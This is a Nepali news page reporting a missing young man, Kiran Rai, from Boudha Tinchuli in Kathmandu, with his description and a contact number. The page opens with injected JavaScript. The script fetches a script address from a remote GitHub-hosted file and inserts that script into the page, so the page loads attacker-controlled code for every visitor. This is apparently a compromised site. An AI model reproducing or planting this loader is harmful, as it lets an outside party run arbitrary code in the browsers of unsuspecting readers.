;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); बौद्ध तीनचुलीबाट किरण राइ नाम गरेको युवा बेपत्ता, भेटिएमा खबर गर्न अभिभावक अनुरोध – जुनेली न्युज
बुधबार, बैशाख ४, २०८२
  • होमपेज
  • बौद्ध तीनचुलीबाट किरण राइ नाम गरेको युवा बेपत्ता, भेटिएमा खबर गर्न अभिभावक अनुरोध
जुनेली बिशेष

बौद्ध तीनचुलीबाट किरण राइ नाम गरेको युवा बेपत्ता, भेटिएमा खबर गर्न अभिभावक अनुरोध

काठमाडौँ ।ओखलढुंगा जिल्ला माने भन्ज्यांग गाउपलिका वडा नं ६, हेलापानी स्थायी घर भइ हाल काठमाडौँ बौद्ध तीनचुली बस्दै आएका कुमार राइको छोरा अन्दाजी २५ बर्षीय किरण राइ मिति २०७७ भद्रा २८ गते बेलुका ५ बजे बाट हराएको हुन् | बेपत्ता किरण राइको उचाई ५.४ फिट रहेको थियो |

घर बाट हराउने बेला निलो  रंगको लुगा जर्शीको कट्टु लगाएका थिए भने जुत्ता चप्पल केहि लगाएका थिएनन् | जानकारी आए बमोजिम हराएका किरण राइको मानसिक सन्तुलन  गुमेको छ |

काही कतै देख्नुहुने महानुभावहरुले नजिकैको प्रहरी चौकी वा ९८६२९९४२६१ मा सम्पर्क गरिदिनु होला |

फेसबुक प्रतिक्रियाहरु